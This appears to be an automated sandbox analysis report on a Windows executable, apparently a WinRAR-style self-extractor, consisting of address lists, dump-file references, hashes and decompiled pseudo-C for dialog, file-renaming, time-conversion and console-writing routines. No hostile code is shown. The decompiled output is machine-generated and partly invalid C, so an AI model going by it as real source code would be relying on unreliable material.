    0x00832727
    0x00832743
    0x0083274a
    0x00832754
    0x0083260e
    0x0083261b
    0x00832620
    0x00832624
    0x00832628
    0x00832630
    0x00832630
    0x00000000
    0x0083260c
    0x0083225c
    0x0083225f
    0x008325de
    0x008325e3
    0x008325e5
    0x00000000
    0x00000000
    0x008325eb
    0x008325f3
    0x008325fd
    0x008322b4
    0x008322b6
    0x00000000
    0x008322b6
    0x00832265
    0x00832268
    0x0083245f
    0x00832461
    0x00000000
    0x00000000
    0x00832467
    0x00832472
    0x00832474
    0x00832479
    0x0083247d
    0x0083247f
    0x00832485
    0x00832489
    0x00832489
    0x0083248c
    0x00832490
    0x00832492
    0x00832494
    0x00832496
    0x008324ba
    0x00832498
    0x008324a6
    0x008324a6
    0x008324bf
    0x008324c3
    0x008324c3
    0x008324c7
    0x008324c7
    0x008324ca
    0x008324ce
    0x008324d0
    0x008324d2
    0x008324d4
    0x008324f8
    0x008324d6
    0x008324e4
    0x008324e4
    0x008324d4
    0x008324fd
    0x00832503
    0x00832503
    0x00832506
    0x0083250a
    0x0083250c
    0x00832511
    0x00832513
    0x00832537
    0x00832515
    0x00832523
    0x00832523
    0x0083253c
    0x0083253c
    0x00832540
    0x00832545
    0x0083254b
    0x0083254d
    0x00832553
    0x00832558
    0x00832581
    0x00832586
    0x0083255a
    0x0083255c
    0x00832561
    0x00832566
    0x0083256b
    0x0083256d
    0x0083256f
    0x0083257a
    0x0083257a
    0x0083256f
    0x0083258b
    0x00832590
    0x00832599
    0x0083259b
    0x0083259d
    0x008325a8
    0x008325a8
    0x0083259d
    0x008325ad
    0x008325b2
    0x008325bf
    0x008325c1
    0x008325c3
    0x008325d2
    0x008325d2
    0x008325c3
    0x008325b2
    0x0083254d
    0x00000000
    0x00832545
    0x00832469
    0x0083246c
    0x00000000
    0x00000000
    0x00000000
    0x0083246c
    0x0083226e
    0x00832271
    0x00832402
    0x00832404
    0x00000000
    0x00000000
    0x0083240a
    0x00832415
    0x00832417
    0x00832423
    0x00832425
    0x00832435
    0x0083243f
    0x00832444
    0x00832455
    0x00832455
    0x00000000
    0x00832425
    0x0083240c
    0x0083240f
    0x00000000
    0x00000000
    0x00000000
    0x0083240f
    0x00832277
    0x0083227a
    0x0083238d
    0x0083239c
    0x008323a7
    0x008323a9
    0x008323b1
    0x008323b7
    0x008323c4
    0x008323c9
    0x008323c9
    0x008323df
    0x008323e4
    0x008323ef
    0x008323f7
    0x008323f8
    0x00000000
    0x008323f8
    0x00832280
    0x00832283
    0x008322c2
    0x008322c9
    0x008322d0
    0x008322d9
    0x008322e7
    0x008322ed
    0x008322f4
    0x008322f8
    0x008322fa
    0x00832303
    0x0083230a
    0x0083230c
    0x0083230e
    0x0083230e
    0x00832314
    0x00832319
    0x0083231d
    0x0083231d
    0x00832321
    0x00832323
    0x0083232c
    0x00832333
    0x00832335
    0x00832337
    0x00832337
    0x0083233a
    0x00832343
    0x00832348
    0x00832348
    0x0083234c
    0x00832353
    0x0083235c
    0x0083235c
    0x00832362
    0x00832369
    0x00832372
    0x00832372
    0x00832378
    0x00000000
    0x00832378
    0x00832288
    0x00000000
    0x00000000
    0x00832292
    0x008322a0
    0x008322a0
    0x008322a3
    0x008322ac
    0x008322b1
    0x008322b2
    0x00000000
    0x008322b2
    0x0083275b
    0x0083275b
    0x0083275b
    0x0083275f
    0x00832765
    0x0083276a
    0x00000000
    0x00000000
    0x00000000
    0x0083276a
    0x00832234
    0x00832194
    0x00832165
    0x00832772

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID: ;%u$x%u$xc%u
    • API String ID: 0-2277559157
    • Opcode ID: 8f3670d9ae78e89ed0e5bf70a556841cdc9b484d68ad80eb692f29e447aedec4
    • Instruction ID: efda94b79c3681cf96f2bd03ac9eaafe1024495de37c40af2c2eb81bf94b8061
    • Opcode Fuzzy Hash: 8f3670d9ae78e89ed0e5bf70a556841cdc9b484d68ad80eb692f29e447aedec4
    • Instruction Fuzzy Hash: 6FF123B16043409ADB15EF2C8895BFE7799FFD0300F084569F98ADB287CA649949C7E3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E0084A43C(void* __ecx, void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
    				long _t9;
    				long _t10;
    				WCHAR* _t11;
    				void* _t25;
    				signed short _t28;
    				intOrPtr _t31;
    				struct HWND__* _t35;
    				intOrPtr _t36;
    				void* _t37;
    				struct HWND__* _t38;
    
    				_t28 = _a12;
    				_t36 = _a8;
    				_t35 = _a4;
    				if(E008312D7(__edx, _t35, _t36, _t28, _a16, L"LICENSEDLG", 0, 0) != 0) {
    					L16:
    					__eflags = 1;
    					return 1;
    				}
    				_t37 = _t36 - 0x110;
    				if(_t37 == 0) {
    					E0084C399(__edx, __eflags, __fp0, _t35);
    					_t9 =  *0x87b704;
    					__eflags = _t9;
    					if(_t9 != 0) {
    						SendMessageW(_t35, 0x80, 1, _t9);
    					}
    					_t10 =  *0x885d04;
    					__eflags = _t10;
    					if(_t10 != 0) {
    						SendDlgItemMessageW(_t35, 0x66, 0x172, 0, _t10);
    					}
    					_t11 =  *0x88de1c;
    					__eflags = _t11;
    					if(__eflags != 0) {
    						SetWindowTextW(_t35, _t11);
    					}
    					_t38 = GetDlgItem(_t35, 0x65);
    					SendMessageW(_t38, 0x435, 0, 0x10000);
    					SendMessageW(_t38, 0x443, 0,  *0x86df40(0xf));
    					 *0x86df3c(_t35);
    					_t31 =  *0x8775e0; // 0x0
    					E00849059(_t31, __eflags,  *0x870064, _t38,  *0x88de18, 0, 0);
    					L00852BAE( *0x88de1c);
    					L00852BAE( *0x88de18);
    					goto L16;
    				}
    				if(_t37 != 1) {
    					L5:
    					return 0;
    				}
    				_t25 = (_t28 & 0x0000ffff) - 1;
    				if(_t25 == 0) {
    					_push(1);
    					L7:
    					EndDialog(_t35, ??);
    					goto L16;
    				}
    				if(_t25 == 1) {
    					_push(0);
    					goto L7;
    				}
    				goto L5;
    			}













    0x0084a43d
    0x0084a443
    0x0084a44a
    0x0084a463
    0x0084a549
    0x0084a54b
    0x00000000
    0x0084a54b
    0x0084a469
    0x0084a46f
    0x0084a49c
    0x0084a4a1
    0x0084a4ac
    0x0084a4ae
    0x0084a4b9
    0x0084a4b9
    0x0084a4bb
    0x0084a4c0
    0x0084a4c2
    0x0084a4ce
    0x0084a4ce
    0x0084a4d4
    0x0084a4d9
    0x0084a4db
    0x0084a4df
    0x0084a4df
    0x0084a4f4
    0x0084a4fc
    0x0084a50e
    0x0084a511
    0x0084a517
    0x0084a52c
    0x0084a537
    0x0084a542
    0x00000000
    0x0084a548
    0x0084a474
    0x0084a483
    0x00000000
    0x0084a483
    0x0084a479
    0x0084a47c
    0x0084a497
    0x0084a48b
    0x0084a48c
    0x00000000
    0x0084a48c
    0x0084a481
    0x0084a48a
    0x00000000
    0x0084a48a
    0x00000000

    APIs
      • Part of subcall function 008312D7: GetDlgItem.USER32(00000000,00003021), ref: 0083131B
      • Part of subcall function 008312D7: SetWindowTextW.USER32(00000000,008622E4), ref: 00831331
    • EndDialog.USER32(?,00000001), ref: 0084A48C
    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0084A4B9
    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0084A4CE
    • SetWindowTextW.USER32(?,?), ref: 0084A4DF
    • GetDlgItem.USER32(?,00000065), ref: 0084A4E8
    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0084A4FC
    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0084A50E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: MessageSend$Item$TextWindow$Dialog
    • String ID: LICENSEDLG
    • API String ID: 3214253823-2177901306
    • Opcode ID: f8ac8ea6e9b8708c560eb3aab9aeda182f7fd8d94a6ed772b46c0c674ef07482
    • Instruction ID: a05ac2d5a6d25bab8898d0a7395d2cb9b40e6608d67de7837f70aa70d12572a6
    • Opcode Fuzzy Hash: f8ac8ea6e9b8708c560eb3aab9aeda182f7fd8d94a6ed772b46c0c674ef07482
    • Instruction Fuzzy Hash: C721A132740208BBD6159B7AED4DF7F3B6CFB4AB55F024018F601EA1A0CBD298019776
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E00839300(void* __ecx) {
    				void* _t31;
    				short _t32;
    				long _t34;
    				void* _t39;
    				short _t41;
    				void* _t65;
    				intOrPtr _t68;
    				void* _t76;
    				intOrPtr _t79;
    				void* _t82;
    				WCHAR* _t83;
    				void* _t85;
    				void* _t87;
    
    				E0084D8C4(E008613BA, __ecx);
    				E0084D9C0();
    				_t83 =  *(_t85 + 8);
    				_t31 = _t85 - 0x4030;
    				__imp__GetLongPathNameW(_t83, _t31, 0x800, _t76, _t82, _t65);
    				if(_t31 == 0 || _t31 >= 0x800) {
    					L20:
    					_t32 = 0;
    					__eflags = 0;
    				} else {
    					_t34 = GetShortPathNameW(_t83, _t85 - 0x5030, 0x800);
    					if(_t34 == 0) {
    						goto L20;
    					} else {
    						_t92 = _t34 - 0x800;
    						if(_t34 >= 0x800) {
    							goto L20;
    						} else {
    							 *(_t85 + 8) = E0083B9E0(_t92, _t85 - 0x4030);
    							_t78 = E0083B9E0(_t92, _t85 - 0x5030);
    							_t68 = 0;
    							if( *_t38 == 0) {
    								goto L20;
    							} else {
    								_t39 = E00841438( *(_t85 + 8), _t78);
    								_t94 = _t39;
    								if(_t39 == 0) {
    									goto L20;
    								} else {
    									_t41 = E00841438(E0083B9E0(_t94, _t83), _t78);
    									if(_t41 != 0) {
    										goto L20;
    									} else {
    										 *(_t85 - 0x100c) = _t41;
    										_t79 = 0;
    										while(1) {
    											_t96 = _t41;
    											if(_t41 != 0) {
    												break;
    											}
    											E0083FAE7(_t85 - 0x100c, _t83, 0x800);
    											E00833F53(E0083B9E0(_t96, _t85 - 0x100c), 0x800, L"rtmp%d", _t79);
    											_t87 = _t87 + 0x10;
    											if(E00839F0F(_t85 - 0x100c) == 0) {
    												_t41 =  *(_t85 - 0x100c);
    											} else {
    												_t41 = 0;
    												 *(_t85 - 0x100c) = 0;
    											}
    											_t79 = _t79 + 0x7b;
    											if(_t79 < 0x2710) {
    												continue;
    											} else {
    												_t99 = _t41;
    												if(_t41 == 0) {
    													goto L20;
    												} else {
    													break;
    												}
    											}
    											goto L21;
    										}
    										E0083FAE7(_t85 - 0x3030, _t83, 0x800);
    										_push(0x800);
    										E0083BA56(_t99, _t85 - 0x3030,  *(_t85 + 8));
    										if(MoveFileW(_t85 - 0x3030, _t85 - 0x100c) == 0) {
    											goto L20;
    										} else {
    											E008394D4(_t85 - 0x2030);
    											 *((intOrPtr*)(_t85 - 4)) = _t68;
    											if(E00839F0F(_t83) == 0) {
    												_push(0x12);
    												_push(_t83);
    												_t68 = E008395C0(_t85 - 0x2030);
    											}
    											MoveFileW(_t85 - 0x100c, _t85 - 0x3030);
    											if(_t68 != 0) {
    												E00839572(_t85 - 0x2030);
    												E008396B9(_t85 - 0x2030);
    											}
    											E00839506(_t85 - 0x2030);
    											_t32 = 1;
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    				L21:
    				 *[fs:0x0] =  *((intOrPtr*)(_t85 - 0xc));
    				return _t32;
    			}
















    0x00839305
    0x0083930f
    0x00839316
    0x00839319
    0x00839328
    0x00839330
    0x008394bf
    0x008394bf
    0x008394bf
    0x0083933e
    0x00839347
    0x0083934f
    0x00000000
    0x00839355
    0x00839355
    0x00839357
    0x00000000
    0x0083935d
    0x00839369
    0x00839378
    0x0083937a
    0x0083937f
    0x00000000
    0x00839385
    0x00839389
    0x0083938e
    0x00839390
    0x00000000
    0x00839396
    0x0083939e
    0x008393a5
    0x00000000
    0x008393ab
    0x008393ab
    0x008393b2
    0x008393b4
    0x008393b4
    0x008393b7
    0x00000000
    0x00000000
    0x008393c6
    0x008393e3
    0x008393e8
    0x008393f9
    0x00839406
    0x008393fb
    0x008393fb
    0x008393fd
    0x008393fd
    0x0083940d
    0x00839416
    0x00000000
    0x00839418
    0x00839418
    0x0083941b
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0083941b
    0x00000000
    0x00839416
    0x0083942f
    0x00839434
    0x0083943f
    0x0083945c
    0x00000000
    0x0083945e
    0x00839464
    0x0083946a
    0x00839474
    0x00839476
    0x00839478
    0x00839484
    0x00839484
    0x00839494
    0x00839498
    0x008394a0
    0x008394ab
    0x008394ab
    0x008394b6
    0x008394bb
    0x008394bb
    0x0083945c
    0x008393a5
    0x00839390
    0x0083937f
    0x00839357
    0x0083934f
    0x008394c1
    0x008394c7
    0x008394d1

    APIs
    • __EH_prolog.LIBCMT ref: 00839305
    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00839328
    • GetShortPathNameW.KERNEL32 ref: 00839347
      • Part of subcall function 00841438: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0083ADA2,?,?,?,0083AD51,?,-00000002,?,00000000,?), ref: 0084144E
    • _swprintf.LIBCMT ref: 008393E3
      • Part of subcall function 00833F53: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00833F66
    • MoveFileW.KERNEL32(?,?), ref: 00839458
    • MoveFileW.KERNEL32(?,?), ref: 00839494
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
    • String ID: rtmp%d
    • API String ID: 2111052971-3303766350
    • Opcode ID: f441d9666321d46a751926b360eeb544981ad2230889b8bd2cd3148f6599a38a
    • Instruction ID: 83889adf9a7d3c75c569b973bb85e0f863dce47b72709ece6ca0f05972245997
    • Opcode Fuzzy Hash: f441d9666321d46a751926b360eeb544981ad2230889b8bd2cd3148f6599a38a
    • Instruction Fuzzy Hash: DD418D71912258A6DF20FBA4CD45EEA777CFF84380F0440E5E689E3141EAB49B85CBE5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E00840708(intOrPtr* __ecx, intOrPtr __edx, void* __eflags, signed int* _a4) {
    				struct _SYSTEMTIME _v16;
    				struct _SYSTEMTIME _v32;
    				struct _SYSTEMTIME _v48;
    				struct _FILETIME _v56;
    				struct _FILETIME _v64;
    				struct _FILETIME _v72;
    				intOrPtr _v76;
    				intOrPtr _v80;
    				signed int _t73;
    				void* _t81;
    				signed int _t85;
    				void* _t86;
    				intOrPtr _t87;
    				intOrPtr* _t89;
    				intOrPtr* _t90;
    				signed int* _t92;
    				signed int _t94;
    
    				_t87 = __edx;
    				_t90 = __ecx;
    				_v80 = E0084DF20( *__ecx,  *((intOrPtr*)(__ecx + 4)), 0x64, 0);
    				_v76 = _t87;
    				if(E0083AA39() >= 0x600) {
    					FileTimeToSystemTime( &_v64,  &_v32);
    					SystemTimeToTzSpecificLocalTime(0,  &_v32,  &_v16);
    					SystemTimeToFileTime( &_v16,  &_v72);
    					SystemTimeToFileTime( &_v32,  &_v56);
    					asm("sbb ecx, [esp+0x24]");
    					asm("sbb ecx, ebp");
    					asm("adc ecx, ebp");
    					_v72.dwLowDateTime = 0 - _v56.dwLowDateTime + _v72.dwLowDateTime + _v64.dwLowDateTime;
    					asm("adc ecx, ebp");
    					_v72.dwHighDateTime = _v72.dwHighDateTime + _v64.dwHighDateTime;
    				} else {
    					FileTimeToLocalFileTime( &_v64,  &_v72);
    				}
    				FileTimeToSystemTime( &_v72,  &_v48);
    				_t92 = _a4;
    				_t81 = 1;
    				_t85 = _v48.wDay & 0x0000ffff;
    				_t94 = _v48.wMonth & 0x0000ffff;
    				_t88 = _v48.wYear & 0x0000ffff;
    				_t92[3] = _v48.wHour & 0x0000ffff;
    				_t92[4] = _v48.wMinute & 0x0000ffff;
    				_t92[5] = _v48.wSecond & 0x0000ffff;
    				_t92[7] = _v48.wDayOfWeek & 0x0000ffff;
    				 *_t92 = _v48.wYear & 0x0000ffff;
    				_t92[1] = _t94;
    				_t92[2] = _t85;
    				_t92[8] = _t85 - 1;
    				if(_t94 > 1) {
    					_t89 = 0x86d084;
    					_t86 = 4;
    					while(_t86 <= 0x30) {
    						_t86 = _t86 + 4;
    						_t92[8] = _t92[8] +  *_t89;
    						_t89 = _t89 + 4;
    						_t81 = _t81 + 1;
    						if(_t81 < _t94) {
    							continue;
    						}
    						break;
    					}
    					_t88 = _v48.wYear & 0x0000ffff;
    				}
    				if(_t94 > 2 && E00840871(_t88) != 0) {
    					_t92[8] = _t92[8] + 1;
    				}
    				_t73 = E0084DF90( *_t90,  *((intOrPtr*)(_t90 + 4)), 0x3b9aca00, 0);
    				_t92[6] = _t73;
    				return _t73;
    			}




















    0x00840708
    0x0084070f
    0x00840720
    0x00840724
    0x00840738
    0x00840756
    0x00840763
    0x00840779
    0x00840785
    0x00840793
    0x0084079b
    0x008407a1
    0x008407a7
    0x008407ab
    0x008407ad
    0x0084073a
    0x00840744
    0x00840744
    0x008407bb
    0x008407bd
    0x008407c8
    0x008407c9
    0x008407ce
    0x008407d3
    0x008407d8
    0x008407e0
    0x008407e8
    0x008407f0
    0x008407f6
    0x008407f8
    0x008407fb
    0x008407fe
    0x00840803
    0x00840807
    0x0084080c
    0x0084080d
    0x00840814
    0x00840817
    0x0084081a
    0x0084081d
    0x00840820
    0x00000000
    0x00000000
    0x00000000
    0x00840820
    0x00840822
    0x00840822
    0x0084082a
    0x00840836
    0x00840836
    0x00840845
    0x0084084b
    0x00840854

    APIs
    • __aulldiv.LIBCMT ref: 0084071B
      • Part of subcall function 0083AA39: GetVersionExW.KERNEL32(?), ref: 0083AA5E
    • FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 00840744
    • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 00840756
    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00840763
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00840779
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00840785
    • FileTimeToSystemTime.KERNEL32(?,?), ref: 008407BB
    • __aullrem.LIBCMT ref: 00840845
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
    • String ID:
    • API String ID: 1247370737-0
    • Opcode ID: 9e9da42d69d668b1b0504db12a0e4c356f4f1ac121ec296840800fe5b5636b92
    • Instruction ID: c4c0b046ffa43b04b98801ad5cac7204ae79a6b6f1a815e3ea3739f89320424f
    • Opcode Fuzzy Hash: 9e9da42d69d668b1b0504db12a0e4c356f4f1ac121ec296840800fe5b5636b92
    • Instruction Fuzzy Hash: 3C4117B2408319AFC714DFA5C88096BB7E8FB88714F104A2EF696D2650E775E548CB92
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E0085E33D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
    				signed int _v8;
    				signed char _v15;
    				char _v16;
    				void _v24;
    				short _v28;
    				char _v31;
    				void _v32;
    				long _v36;
    				intOrPtr _v40;
    				void* _v44;
    				signed int _v48;
    				signed char* _v52;
    				long _v56;
    				int _v60;
    				signed int _t78;
    				signed int _t80;
    				int _t86;
    				void* _t94;
    				long _t97;
    				void _t105;
    				void* _t112;
    				signed int _t116;
    				signed int _t118;
    				signed char _t123;
    				signed char _t128;
    				intOrPtr _t129;
    				signed int _t131;
    				signed char* _t133;
    				intOrPtr* _t135;
    				signed int _t136;
    				void* _t137;
    
    				_t78 =  *0x86d668; // 0x14325215
    				_v8 = _t78 ^ _t136;
    				_t80 = _a8;
    				_t118 = _t80 >> 6;
    				_t116 = (_t80 & 0x0000003f) * 0x30;
    				_t133 = _a12;
    				_v52 = _t133;
    				_v48 = _t118;
    				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x890420 + _t118 * 4)) + _t116 + 0x18));
    				_v40 = _a16 + _t133;
    				_t86 = GetConsoleCP();
    				_t135 = _a4;
    				_v60 = _t86;
    				 *_t135 = 0;
    				 *((intOrPtr*)(_t135 + 4)) = 0;
    				 *((intOrPtr*)(_t135 + 8)) = 0;
    				while(_t133 < _v40) {
    					_v28 = 0;
    					_v31 =  *_t133;
    					_t129 =  *((intOrPtr*)(0x890420 + _v48 * 4));
    					_t123 =  *(_t129 + _t116 + 0x2d);
    					if((_t123 & 0x00000004) == 0) {
    						if(( *(E008594CF(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
    							_push(1);
    							_push(_t133);
    							goto L8;
    						} else {
    							if(_t133 >= _v40) {
    								_t131 = _v48;
    								 *((char*)( *((intOrPtr*)(0x890420 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
    								 *( *((intOrPtr*)(0x890420 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x890420 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
    								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
    							} else {
    								_t112 = E008580A7( &_v28, _t133, 2);
    								_t137 = _t137 + 0xc;
    								if(_t112 != 0xffffffff) {
    									_t133 =  &(_t133[1]);
    									goto L9;
    								}
    							}
    						}
    					} else {
    						_t128 = _t123 & 0x000000fb;
    						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
    						_push(2);
    						_v15 = _t128;
    						 *(_t129 + _t116 + 0x2d) = _t128;
    						_push( &_v16);
    						L8:
    						_push( &_v28);
    						_t94 = E008580A7();
    						_t137 = _t137 + 0xc;
    						if(_t94 != 0xffffffff) {
    							L9:
    							_t133 =  &(_t133[1]);
    							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
    							_v56 = _t97;
    							if(_t97 != 0) {
    								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
    									L19:
    									 *_t135 = GetLastError();
    								} else {
    									_t48 = _t135 + 8; // 0xff76e900
    									 *((intOrPtr*)(_t135 + 4)) =  *_t48 - _v52 + _t133;
    									if(_v36 >= _v56) {
    										if(_v31 != 0xa) {
    											goto L16;
    										} else {
    											_t105 = 0xd;
    											_v32 = _t105;
    											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
    												goto L19;
    											} else {
    												if(_v36 >= 1) {
    													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
    													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
    													goto L16;
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    					goto L20;
    					L16:
    				}
    				L20:
    				return E0084E243(_v8 ^ _t136);
    			}


































    0x0085e345
    0x0085e34c
    0x0085e34f
    0x0085e357
    0x0085e35b
    0x0085e367
    0x0085e36a
    0x0085e36d
    0x0085e374
    0x0085e37c
    0x0085e37f
    0x0085e385
    0x0085e38b
    0x0085e390
    0x0085e392
    0x0085e395
    0x0085e39a
    0x0085e3a4
    0x0085e3ab
    0x0085e3ae
    0x0085e3b5
    0x0085e3bc
    0x0085e3e8
    0x0085e40e
    0x0085e410
    0x00000000
    0x0085e3ea
    0x0085e3ed
    0x0085e4b4
    0x0085e4c0
    0x0085e4cb
    0x0085e4d0
    0x0085e3f3
    0x0085e3fa
    0x0085e3ff
    0x0085e405
    0x0085e40b
    0x00000000
    0x0085e40b
    0x0085e405
    0x0085e3ed
    0x0085e3be
    0x0085e3c2
    0x0085e3c5
    0x0085e3cb
    0x0085e3cd
    0x0085e3d0
    0x0085e3d4
    0x0085e411
    0x0085e414
    0x0085e415
    0x0085e41a
    0x0085e420
    0x0085e426
    0x0085e435
    0x0085e43b
    0x0085e441
    0x0085e446
    0x0085e462
    0x0085e4d5
    0x0085e4db
    0x0085e464
    0x0085e464
    0x0085e46c
    0x0085e475
    0x0085e47b
    0x00000000
    0x0085e47d
    0x0085e47f
    0x0085e482
    0x0085e49b
    0x00000000
    0x0085e49d
    0x0085e4a1
    0x0085e4a3
    0x0085e4a6
    0x00000000
    0x0085e4a6
    0x0085e4a1
    0x0085e49b
    0x0085e47b
    0x0085e475
    0x0085e462
    0x0085e446
    0x0085e420
    0x00000000
    0x0085e4a9
    0x0085e4a9
    0x0085e4dd
    0x0085e4ef

    APIs
    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0085EAB2,00000000,00000000,00000000,00000000,00000000,0085401F), ref: 0085E37F
    • __fassign.LIBCMT ref: 0085E3FA
    • __fassign.LIBCMT ref: 0085E415
    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0085E43B
    • WriteFile.KERNEL32(?,00000000,00000000,0085EAB2,00000000,?,?,?,?,?,?,?,?,?,0085EAB2,00000000), ref: 0085E45A
    • WriteFile.KERNEL32(?,00000000,00000001,0085EAB2,00000000,?,?,?,?,?,?,?,?,?,0085EAB2,00000000), ref: 0085E493
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
    • String ID:
    • API String ID: 1324828854-0
    • Opcode ID: e3c15715c0a23f1c54cd6fb461ce0f19819ef50b319910dc8c53b1e5b2b88b9f
    • Instruction ID: 3dcb3b246f69eddff5d4c7e973903514e716e71eadc0e22deadd4b8f546d362c
    • Opcode Fuzzy Hash: e3c15715c0a23f1c54cd6fb461ce0f19819ef50b319910dc8c53b1e5b2b88b9f
    • Instruction Fuzzy Hash: 335116B0E006089FCB14CFA8DC81AEEBBF9FF08311F1441AAE951E7291D7309A44CB65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 52%
    			E0084BBB6(intOrPtr __ebx, void* __ecx) {
    				intOrPtr _t209;
    				void* _t210;
    				intOrPtr _t263;
    				WCHAR* _t277;
    				void* _t279;
    				WCHAR* _t280;
    				void* _t285;
    
    				L0:
    				while(1) {
    					L0:
    					_t263 = __ebx;
    					if(__ebx != 1) {
    						goto L112;
    					}
    					L96:
    					__eax = __ebp - 0x7c84;
    					__edi = 0x800;
    					GetTempPathW(0x800, __ebp - 0x7c84) = __ebp - 0x7c84;
    					E0083AF49(__eflags, __ebp - 0x7c84, 0x800) = 0;
    					__esi = 0;
    					_push(0);
    					while(1) {
    						L98:
    						_push( *0x86d5f8);
    						__ebp - 0x7c84 = E00833F53(0x8785fa, __edi, L"%s%s%u", __ebp - 0x7c84);
    						__eax = E00839F0F(0x8785fa);
    						__eflags = __al;
    						if(__al == 0) {
    							break;
    						}
    						L97:
    						__esi =  &(__esi->i);
    						__eflags = __esi;
    						_push(__esi);
    					}
    					L99:
